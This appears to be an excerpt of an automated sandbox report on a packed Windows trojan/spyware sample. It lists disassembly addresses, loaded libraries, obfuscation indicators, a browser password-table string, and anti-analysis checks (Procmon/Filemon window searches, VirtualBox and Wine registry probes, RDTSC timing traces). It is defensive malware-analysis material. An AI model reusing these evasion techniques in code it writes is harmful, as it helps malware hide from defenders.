                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A5F3840_2_00A5F384
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AD738F0_2_00AD738F
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AD53810_2_00AD5381
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A933870_2_00A93387
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009F73DF0_2_009F73DF
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009FF3DA0_2_009FF3DA
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A7D3EC0_2_00A7D3EC
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009ED3C70_2_009ED3C7
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A4F3DD0_2_00A4F3DD
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AFB32B0_2_00AFB32B
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A8732D0_2_00A8732D
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A7333B0_2_00A7333B
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AF73300_2_00AF7330
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A5B3000_2_00A5B300
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AA131C0_2_00AA131C
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A893140_2_00A89314
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009FD3480_2_009FD348
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009F33430_2_009F3343
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AF135C0_2_00AF135C
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009DD3610_2_009DD361
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A3735F0_2_00A3735F
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A473590_2_00A47359
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AC14A80_2_00AC14A8
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AAF48A0_2_00AAF48A
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A614840_2_00A61484
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00ABF4890_2_00ABF489
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00ACD4850_2_00ACD485
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A5D49C0_2_00A5D49C
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AED4FA0_2_00AED4FA
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A494C60_2_00A494C6
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00B954CC0_2_00B954CC
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A434270_2_00A43427
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009CB4100_2_009CB410
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AF94230_2_00AF9423
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A8341A0_2_00A8341A
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AAB4600_2_00AAB460
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A8547A0_2_00A8547A
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009C94400_2_009C9440
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A894740_2_00A89474
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AC544C0_2_00AC544C
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A9744F0_2_00A9744F
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00B8B4500_2_00B8B450
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A074500_2_00A07450
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A594540_2_00A59454
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A694520_2_00A69452
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A6F4510_2_00A6F451
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A7D5A60_2_00A7D5A6
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AA55AD0_2_00AA55AD
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A7F5B50_2_00A7F5B5
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AB758E0_2_00AB758E
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00ABD5920_2_00ABD592
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00B7F5890_2_00B7F589
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AD95EF0_2_00AD95EF
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009D75D30_2_009D75D3
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AE15FB0_2_00AE15FB
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AC95DD0_2_00AC95DD
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A715D90_2_00A715D9
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A9952D0_2_00A9952D
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AF75020_2_00AF7502
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: String function: 009DB0F0 appears 116 times
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: String function: 009CB210 appears 48 times
                Source: JqGBbm7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: JqGBbm7.exe | Static PE information: Section: ZLIB complexity 0.9981260557432432
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/1
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_009FA3E0 CoCreateInstance | 0_2_009FA3E0
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: JqGBbm7.exe, 00000000.00000003.1712262838.0000000005716000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: JqGBbm7.exe | Virustotal: Detection: 69%
                Source: JqGBbm7.exe | ReversingLabs: Detection: 73%
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File read: C:\Users\user\Desktop\JqGBbm7.exe
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Section loaded: version.dll
                Source: JqGBbm7.exe | Static file information: File size 2996224 > 1048576
                Source: JqGBbm7.exe | Static PE information: Raw size of cmtgbjjz is bigger than: 0x100000 < 0x2a9a00

                Data Obfuscation

                Source: C:\Users\user\Desktop\JqGBbm7.exe | Unpacked PE file: 0.2.JqGBbm7.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W;cmtgbjjz:EW;amlicovq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cmtgbjjz:EW;amlicovq:EW;.taggant:EW;
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: JqGBbm7.exe | Static PE information: real checksum: 0x2e433e should be: 0x2e2fec
                Source: JqGBbm7.exe | Static PE information: section name:
                Source: JqGBbm7.exe | Static PE information: section name: .idata
                Source: JqGBbm7.exe | Static PE information: section name: cmtgbjjz
                Source: JqGBbm7.exe | Static PE information: section name: amlicovq
                Source: JqGBbm7.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A274B7 push eax; mov dword ptr [esp], ebp | 0_2_00A274CF
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A274B7 push 675A1D1Fh; mov dword ptr [esp], eax | 0_2_00A278E5
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A274B7 push 154256FBh; mov dword ptr [esp], ecx | 0_2_00A281FF
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A27D72 push ebp; mov dword ptr [esp], 38F8CFCCh | 0_2_00A28434
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00AC8094 push edi; mov dword ptr [esp], eax | 0_2_00AC83F5
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00AC8094 push 75569023h; mov dword ptr [esp], esi | 0_2_00AC83FD
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00AC8094 push ecx; mov dword ptr [esp], 42BF80C7h | 0_2_00AC8431
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00AC8094 push 7050F667h; mov dword ptr [esp], ebp | 0_2_00AC845E
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00AC8094 push eax; mov dword ptr [esp], ecx | 0_2_00AC84F4
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00AC8094 push 59A839ACh; mov dword ptr [esp], eax | 0_2_00AC8655
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00AC8094 push ecx; mov dword ptr [esp], esi | 0_2_00AC8687
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A2C033 push eax; mov dword ptr [esp], 7E2E8A86h | 0_2_00A2C041
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A2A059 push eax; mov dword ptr [esp], 7EF6D25Bh | 0_2_00A2C405
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00C761A2 push 1A3D7EADh; mov dword ptr [esp], ebp | 0_2_00C761BD
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A2A1D2 push edx; mov dword ptr [esp], ecx | 0_2_00A2A3C5
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A2A121 push eax; mov dword ptr [esp], 055DFD93h | 0_2_00A2E450
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A2C104 push 650DCC59h; mov dword ptr [esp], esi | 0_2_00A2C109
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A2C104 push edx; mov dword ptr [esp], 7FBD0EBCh | 0_2_00A2C10D
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A2C104 push 2D98722Eh; mov dword ptr [esp], ebx | 0_2_00A2C877
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A2A110 push esi; mov dword ptr [esp], 154B8EF5h | 0_2_00A2E5B1
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00C4E177 push 0D5B418Dh; mov dword ptr [esp], ebx | 0_2_00C4E1A9
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00C4E177 push ebx; mov dword ptr [esp], 5456AA98h | 0_2_00C4E1CC
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00C4E177 push 0AC36222h; mov dword ptr [esp], eax | 0_2_00C4E234
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00C40179 push edx; mov dword ptr [esp], edi | 0_2_00C40190
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00C40179 push esi; mov dword ptr [esp], 74AEB000h | 0_2_00C4019E
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00C40179 push esi; mov dword ptr [esp], edi | 0_2_00C40269
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A2A2A3 push edx; mov dword ptr [esp], ecx | 0_2_00A2B5A7
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A2A28D push 6D34B035h; mov dword ptr [esp], edx | 0_2_00A2C36B
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A2C2E3 push 7FDF92AEh; mov dword ptr [esp], edx | 0_2_00A2CB7F
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00C0C25A push 6090D614h; mov dword ptr [esp], esi | 0_2_00C0C29F
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A2A20C push 0F90CE5Ch; mov dword ptr [esp], edx | 0_2_00A2A64E
                Source: JqGBbm7.exe | Static PE information: section name: entropy: 7.987624463356723

                Boot Survival

                Source: C:\Users\user\Desktop\JqGBbm7.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\JqGBbm7.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\JqGBbm7.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCAE56 second address: BCAE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCAE5A second address: BCAE63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCAFF4 second address: BCB015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FC064DD4F87h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCB015 second address: BCB020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCB020 second address: BCB024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: B94FC2 second address: B94FC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: B94FC9 second address: B94FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC064DD4F85h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: B94FE9 second address: B94FED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: B94FED second address: B95027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007FC064DD4F76h 0x0000000d jmp 00007FC064DD4F85h 0x00000012 jmp 00007FC064DD4F87h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: B95027 second address: B9502E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCE4A3 second address: BCE522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC064DD4F7Eh 0x00000008 jns 00007FC064DD4F76h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xor dword ptr [esp], 2FD55F69h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FC064DD4F78h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 call 00007FC064DD4F79h 0x00000037 pushad 0x00000038 jmp 00007FC064DD4F80h 0x0000003d push edx 0x0000003e push eax 0x0000003f pop eax 0x00000040 pop edx 0x00000041 popad 0x00000042 push eax 0x00000043 jbe 00007FC064DD4F7Ch 0x00000049 pushad 0x0000004a push ebx 0x0000004b pop ebx 0x0000004c push ebx 0x0000004d pop ebx 0x0000004e popad 0x0000004f mov eax, dword ptr [esp+04h] 0x00000053 pushad 0x00000054 pushad 0x00000055 jc 00007FC064DD4F76h 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCE522 second address: BCE540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FC064DA37B8h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FC064DA37BCh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCE540 second address: BCE573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC064DD4F87h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCEA12 second address: BCEA16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCF0BE second address: BCF0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCF0C2 second address: BCF0D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCF0D0 second address: BCF0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCF0D9 second address: BCF0DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCF1B1 second address: BCF1C1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC064DD4F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCF352 second address: BCF357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCF357 second address: BCF35D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCF35D second address: BCF381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCF381 second address: BCF399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCF5B7 second address: BCF5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC064DA37B6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCF76C second address: BCF770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BCFD35 second address: BCFD4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BD1516 second address: BD1532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC064DD4F76h 0x00000009 jo 00007FC064DD4F76h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007FC064DD4F76h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BD1F95 second address: BD1F9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BD3B1D second address: BD3B59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnc 00007FC064DD4F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FC064DD4F8Dh 0x00000012 pushad 0x00000013 jmp 00007FC064DD4F7Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BD3B59 second address: BD3B5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BD3B5D second address: BD3B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC064DD4F81h 0x0000000d jnp 00007FC064DD4F76h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BD55A0 second address: BD55AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jbe 00007FC064DA37C0h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BD6168 second address: BD616D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BD637E second address: BD6384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BD616D second address: BD6173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BD6384 second address: BD6389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BDB203 second address: BDB209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BDA328 second address: BDA32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
